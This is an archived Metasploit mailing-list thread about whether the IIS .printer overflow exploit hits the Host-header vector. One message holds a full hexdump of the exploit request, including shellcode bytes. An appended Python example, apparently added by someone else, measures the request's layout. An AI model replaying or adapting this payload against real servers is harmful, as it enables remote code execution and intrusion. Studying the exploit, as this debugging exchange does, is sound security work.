Metasploit mailing list archives

[BUG] please confirm


From: jwasser at skaion.com (John Wasser)
Date: Wed, 13 Apr 2005 14:34:43 -0400

The 'Check' code seems to be modeled after the original 'proof of
concept' code from eEye as shown here:
http://security-protocols.com/modules.php?name=News&file=print&sid=1536

The 'Exploit' code seems to be modeled after this exploit:
http://personal.telefonica.terra.es/web/alexb/e/iisx.c

I think it is possible that:

    GET /NULL.printer HTTP/1.0\r\nHost:SOME.HOST.NAME\r\n\r\n

and 

   GET http://SOME.HOST.NAME/NULL.printer HTTP/1.0\r\n\r\n

are functionally equivalent and therefore go through the same buffer.

One bit that confuses me is that the vulnerable buffer is supposed to
require 'about' 420 characters to overflow but the exploit code uses
only 271.

On Tue, 2005-04-12 at 23:00 -0700, Null Device wrote:
This is w.r.t. the last mail I sent, for the IIS Printer
vulnerability.
The links given are:
http://www.osvdb.org/548 {This is an invalid link}
and
http://seclists.org/lists/bugtraq/2001/May/0011.html
{points to a thread of OpenSSL vulnerabilities}.

Apart from this, I think the exploit for the printer
vulnerability is not the appropriate exploit. Please
refer to my previous mail for details.

Here I am attaching a hexdump of the data that is sent
by Metasploit for exploiting the printer vulnerability.

=============================================
hexdump follows
============================================
00000000  47 45 54 20 68 74 74 70  3a 2f 2f 4e 46 41 40 4e  GET http ://NFA@N
00000010  49 49 4e 92 93 27 4f 99  47 9b 47 99 41 41 49 9f  IIN..'O. G.G.AAI.
00000020  97 f8 f5 90 f8 43 43 47  96 41 fd 4e 93 97 91 41  .....CCG .A.N...A
00000030  4f 46 43 93 4b 4b 96 37  91 40 4b d6 f9 48 96 97  OFC.KK.7 .@K..H..
00000040  47 93 37 49 4e 48 f8 fd  43 4e f5 91 f8 98 93 99  G.7INH.. CN......
00000050  90 43 9f 97 d6 9b 46 4b  4b 49 d6 91 41 43 97 9b  .C....FK KI..AC..
00000060  f8 46 4b 92 99 91 90 46  d6 41 f8 4f fc 4f 42 d6  .FK....F .A.O.OB.
00000070  98 9b f8 93 9f 90 93 42  99 98 4a 9f 4e 40 4e 41  .......B ..J.N@NA
00000080  27 48 f5 40 42 49 41 9b  90 41 47 f9 99 4b 90 93  'H.@BIA. .AG..K..
00000090  4f 42 d6 4e 96 98 41 97  91 93 37 41 fd f9 42 f5  OB.N..A. ..7A..B.
000000A0  98 27 9f 4f f9 27 f8 91  47 91 27 4b 99 41 46 4b  .'.O.'.. G.'K.AFK
000000B0  4b f9 49 f9 41 42 9f 91  fc 42 d6 91 fd 40 98 fc  K.I.AB.. .B...@..
000000C0  97 f9 96 90 91 48 97 f9  46 37 46 fc 97 96 f9 92  .....H.. F7F.....
000000D0  d6 4e 9f fd 4b f9 41 fd  4a f8 96 92 41 f8 f8 42  .N..K.A. J...A..B
000000E0  4a 98 37 37 9f 97 4b 47  f8 49 40 49 90 f9 f5 97  J.77..KG .I@I....
000000F0  fd 9b 43 27 41 fc f8 9b  d6 43 46 27 37 fd 90 37  ..C'A... .CF'7..7
00000100  90 92 4f 49 37 48 90 43  43 4a 4f 4a 97 98 93 4e  ..OI7H.C CJOJ...N
00000110  97 40 37 48 4a fc 49 f3  45 2c 73 41 4e d6 91 27  .@7HJ.I. E,sAN..'
00000120  46 97 fd 8b 4b 60 80 c1  40 80 c5 01 ff e1 2f 6e  F...K`.. @...../n
00000130  75 6c 6c 2e 70 72 69 6e  74 65 72 3f 42 40 41 93  ull.prin ter?B@A.
00000140  46 4f 99 96 27 fc f5 97  f9 93 f5 9f fc 48 92 97  FO..'... .....H..
00000150  90 41 93 27 f8 49 27 4e  91 fd 4b 4b 9f 92 46 49  .A.'.I'N ..KK..FI
00000160  27 46 47 27 fd 93 99 96  48 47 91 96 40 f9 98 43  'FG'.... HG..@..C
00000170  fd fc 99 99 9b 37 fc 4e  27 27 96 99 d6 47 93 fc  .....7.N ''...G..
00000180  40 49 f5 91 4b 27 9f d6  4a 47 46 48 4b 43 41 42  @I..K'.. JGFHKCAB
00000190  f8 48 f9 f9 f5 f5 97 f9  42 47 9f 4e 9f 97 4f 9f  .H...... BG.N..O.
000001A0  41 f5 46 43 f5 40 97 47  90 40 49 40 9f f9 4e fc  A.FC.@.G .@I@..N.
000001B0  48 48 93 4b f9 48 fc 48  93 99 98 99 98 49 f8 97  HH.K.H.H .....I..
000001C0  47 27 37 43 d6 4b f5 f8  4e f5 f8 99 40 d6 46 46  G'7C.K.. N...@.FF
000001D0  90 90 fc 91 93 4b 48 92  93 96 99 91 f8 37 fc 37  .....KH. .....7.7
000001E0  f9 f5 4f 97 48 4a 9f d6  f8 48 4f 4e 40 4f 40 f5  ..O.HJ.. .HON@O@.
000001F0  4f 98 fd 43 4b d6 91 37  40 48 42 49 4a 47 4f fd  O..CK..7 @HBIJGO.
00000200  27 fd 96 42 49 27 91 4a  9f fd fc 46 96 27 47 d6  '..BI'.J ...F.'G.
00000210  f9 9f 96 4a 92 97 27 4f  96 fd 43 96 9b f5 4f 4b  ...J..'O ..C...OK
00000220  91 93 f5 40 4a fc f9 42  41 4e 47 91 43 4a 98 4a  ...@J..B ANG.CJ.J
00000230  99 43 4b 27 99 fc 90 92  37 93 fc 47 41 90 f8 40  .CK'.... 7..GA..@
00000240  49 f5 f9 91 93 d6 90 93  91 49 91 43 99 48 97 96  I....... .I.C.H..
00000250  43 42 41 99 97 d6 42 4f  41 91 92 f9 9f d6 f8 f9  CBA...BO A.......
00000260  f9 49 d6 d6 96 90 40 4e  fc 4e 4b 97 46 4b 37 47  .I....@N .NK.FK7G
00000270  90 92 96 49 4a 9f 41 27  41 f9 92 9b 48 43 46 4a  ...IJ.A' A...HCFJ
00000280  40 d6 49 d6 4a 46 4b 47  98 9f 4f 42 41 9b 4b 97  @.I.JFKG ..OBA.K.
00000290  f5 4b f8 f5 42 43 37 98  98 f5 4a 4a 91 91 98 fd  .K..BC7. ..JJ....
000002A0  f5 41 41 97 99 f8 47 47  96 37 fc f9 93 41 9f 92  .AA...GG .7...A..
000002B0  92 37 37 d6 d6 93 47 97  99 27 9f 4e 91 9f f8 f8  .77...G. .'.N....
000002C0  4f 4b 42 f9 99 92 41 40  90 46 96 4e 37 93 d6 91  OKB...A@ .F.N7...
000002D0  47 f9 fd 46 47 91 4f f5  90 4f 9b 47 f8 43 42 41  G..FG.O. .O.G.CBA
000002E0  4e 97 49 4a 9f 97 d6 99  d6 97 4a 4e 49 43 97 4e  N.IJ.... ..JNIC.N
000002F0  93 97 9f 49 4a 92 97 fd  4e 91 46 97 4a d6 98 41  ...IJ... N.F.J..A
00000300  9b 42 4a 47 4b fc 97 4e  47 42 98 49 4e 4f 91 43  .BJGK..N GB.INO.C
00000310  47 91 99 92 96 d6 48 96  27 97 49 42 93 f9 d6 d6  G.....H. '.IB....
00000320  98 97 43 47 4f f5 4f 47  42 99 90 37 fd 48 4f 90  ..CGO.OG B..7.HO.
00000330  f5 4b f5 48 98 f8 98 9f  92 4b 46 92 37 98 90 4b  .K.H.... .KF.7..K
00000340  98 98 37 47 fc 91 4b 49  fc 90 f9 99 37 4a 43 f9  ..7G..KI ....7JC.
00000350  9f 92 fd 4e 4f fd 47 90  42 49 42 f5 9b 9b 40 41  ...NO.G. BIB...@A
00000360  48 48 49 96 37 96 6a 51  59 d9 ee d9 74 24 f4 5b  HHI.7.jQ Y...t$.[
00000370  81 73 13 92 39 51 b2 83  eb fc e2 f4 6e 53 ba fd  .s..9Q.. ....nS..
00000380  7a c0 ae 4d 6d 59 da de  b6 1d da f7 ae b2 2d b7  z..MmY.. ......-.
00000390  ea 38 be 39 dd 21 da ed  b2 38 ba 51 a2 70 da 86  .8.9.!.. .8.Q.p..
000003A0  19 38 bf 83 52 a0 fd 36  52 4d 56 73 58 34 50 70  .8..R..6 RMVsX4Pp
000003B0  79 cd 6a e6 b6 11 24 51  19 66 75 b3 79 5f da be  y.j...$Q .fu.y_..
000003C0  d9 b2 0e ae 93 d2 52 9e  19 b0 3d 96 8e 58 92 83  ......R. ..=..X..
000003D0  52 5d da f2 a2 b2 11 be  19 49 4d 1f 19 79 59 ec  R]...... .IM..yY.
000003E0  fa b7 1f bc 7e 69 ae 64  a3 e2 37 e1 f4 51 62 80  ....~i.d ..7..Qb.
000003F0  fa 4e 22 80 cd 6d ae 62  fa f2 bc 4e a9 69 ae 64  .N"..m.b ...N.i.d
00000400  cd b0 b4 d4 13 d4 59 b0  c7 53 53 4d 42 51 88 bb  ......Y. .SSMBQ..
00000410  67 94 06 4d 44 6a 02 e1  c1 6a 12 e1 d1 6a ae 62  g..MDj.. .j...j.b
00000420  f4 51 40 ee f4 6a d8 53  07 51 f5 a8 e2 fe 06 4d  .Q@..j.S .Q.....M
00000430  44 53 41 e3 c7 c6 81 da  36 94 7f 5b c5 c6 87 e1  DSA..... 6..[....
00000440  c7 c6 81 da 77 70 d7 fb  c5 c6 87 e2 c6 6d 04 4d  ....wp.. .....m.M
00000450  42 aa 39 55 eb ff 28 e5  6d ef 04 4d 42 5f 3b d6  B.9U..(. m..MB_;.
00000460  f4 51 32 df 1b dc 3b e2  cb 10 9d 3b 75 53 15 3b  .Q2...;. ...;uS.;
00000470  70 08 91 41 38 c7 13 9f  6c 7b 7d 21 1f 43 69 19  p..A8... l{}!.Ci.
00000480  39 92 39 c0 6c 8a 47 4d  e7 7d ae 64 c9 6e 03 e3  9.9.l.GM .}.d.n..
00000490  c3 68 3b b3 c3 68 04 e3  6d e9 39 1f 4b 3c 9f e1  .h;..h.. m.9.K<..
000004A0  6d ef 3b 4d 6d 0e ae 62  19 6e ad 31 56 5d ae 64  m.;Mm..b .n.1V].d
000004B0  c0 c6 81 da 62 b3 55 ed  c1 c6 87 4d 42 39 51 b2  ....b.U. ...MB9Q.
000004C0  20 48 54 54 50 2f 31 2e  30 0d 0a 0d 0a             HTTP/1. 0....
===============================================
hexdump
===============================================

Nowhere do I see a reference to the Host header, which is the
vulnerable vector for this vulnerability.

Anyone who can confirm this?

hdm, spoonm?

--ND


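Added example, not code from this thread, from Metasploit, or from the eEye / iisx.c code it cites: it builds the two request shapes compared above (relative URI plus Host: header, and absolute URI with no Host: header), derives the host a server actually sees from each following the RFC 2616 section 5.2 rule (an absolute Request-URI's host wins and any Host: header is ignored), and parses a hexdump of the kind quoted above so the authority, path and query lengths of a captured request can be measured instead of estimated. The filler lengths and the three-line sample dump are constructed for illustration; the function names are this example's own.

```python
"""Added example (not code from this thread, Metasploit, eEye or iisx.c):
build the two request shapes discussed above, derive the host a server
sees from each, and measure a captured request's layout from its hexdump.
Filler lengths and SAMPLE_DUMP are constructed for illustration."""
import re

CRLF = b"\r\n"

def host_header_form(host: bytes, path: bytes = b"/NULL.printer") -> bytes:
    """eEye-style request: relative URI, host carried in the Host: header."""
    return b"GET " + path + b" HTTP/1.0" + CRLF + b"Host: " + host + CRLF + CRLF

def absolute_uri_form(host: bytes, path: bytes = b"/NULL.printer") -> bytes:
    """iisx.c-style request: host inside an absolute Request-URI, no Host: header."""
    return b"GET http://" + host + path + b" HTTP/1.0" + CRLF + CRLF

def _split_request_line(line: bytes):
    # Split on the first and last space so a URI that itself contains
    # spaces still yields (method, uri, version).
    method, _, rest = line.partition(b" ")
    uri, _, version = rest.rpartition(b" ")
    if not method or not uri or not version.startswith(b"HTTP/"):
        raise ValueError("malformed request line: %r" % line[:40])
    return method, uri, version

def effective_host(request: bytes) -> bytes:
    """Host as RFC 2616 section 5.2 has a server derive it: the host inside an
    absolute Request-URI wins and any Host: header is ignored; otherwise the
    Host: header is used; b'' if neither is present."""
    lines = request.partition(CRLF + CRLF)[0].split(CRLF)
    _, uri, _ = _split_request_line(lines[0])
    if uri[:7].lower() == b"http://":
        return uri[7:].partition(b"/")[0]
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":
            return value.strip()
    return b""

def request_layout(request: bytes) -> dict:
    """Measure a request the way one would against a hexdump: bytes in the
    authority, the path, bytes in the query string, presence of a Host: header."""
    lines = request.partition(CRLF + CRLF)[0].split(CRLF)
    method, uri, _ = _split_request_line(lines[0])
    absolute = uri[:7].lower() == b"http://"
    if absolute:
        authority, slash, rest = uri[7:].partition(b"/")
        target = slash + rest
    else:
        authority, target = b"", uri
    path, _, query = target.partition(b"?")
    has_host_header = any(
        l.partition(b":")[0].strip().lower() == b"host" for l in lines[1:])
    return {
        "method": method,
        "absolute_uri": absolute,
        "authority_len": len(authority),
        "path": path,
        "query_len": len(query),
        "host_header": has_host_header,
        "effective_host_len": len(effective_host(request)),
        "total_len": len(request),
    }

def hexdump_to_bytes(dump: str) -> bytes:
    """Turn 'OFFSET  hh hh ... hh  ascii' lines (16 bytes per line) back into
    bytes.  Ruler and heading lines are skipped.  An offset that does not
    match the byte count so far means a line was lost or wrapped: fail loudly
    rather than return a silently shortened request."""
    out = bytearray()
    for raw in dump.splitlines():
        tokens = raw.split()
        if len(tokens) < 2 or not re.fullmatch(r"[0-9a-fA-F]{8}", tokens[0]):
            continue
        offset = int(tokens[0], 16)
        if offset != len(out):
            raise ValueError(f"offset {offset:#x} but {len(out)} bytes so far")
        for tok in tokens[1:17]:          # at most 16 bytes per line
            if not re.fullmatch(r"[0-9a-fA-F]{2}", tok):
                break                     # reached the ASCII column
            out.append(int(tok, 16))
    return bytes(out)

# Constructed sample: the hexdump of absolute_uri_form(b"AAAA"), laid out
# like the dump quoted above.
SAMPLE_DUMP = """\
00000000  47 45 54 20 68 74 74 70  3a 2f 2f 41 41 41 41 2f  GET http ://AAAA/
00000010  4e 55 4c 4c 2e 70 72 69  6e 74 65 72 20 48 54 54  NULL.pri nter HTT
00000020  50 2f 31 2e 30 0d 0a 0d  0a                       P/1.0....
"""
```

`effective_host()` returns the same 300-byte string for `host_header_form(b"X" * 300)` and `absolute_uri_form(b"X" * 300)`, which is the equivalence the reply above argues for; given a request carrying both an absolute URI and a Host: header it returns the URI's host. Pasting the dump quoted above into `hexdump_to_bytes()` and passing the result to `request_layout()` reports an absolute-URI request with a 291-byte authority between `http://` and `/null.printer` (offsets 0x0B through 0x12D), a 900-byte query string, no Host: header and 1229 bytes in total, which is what the offsets in the dump show (the path begins at 0x12E and the trailing ` HTTP/1.0` at 0x4C0). The offset check in the parser also rejects a dump whose lines have been wrapped by a mail client, since the byte count then stops matching the offset column.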



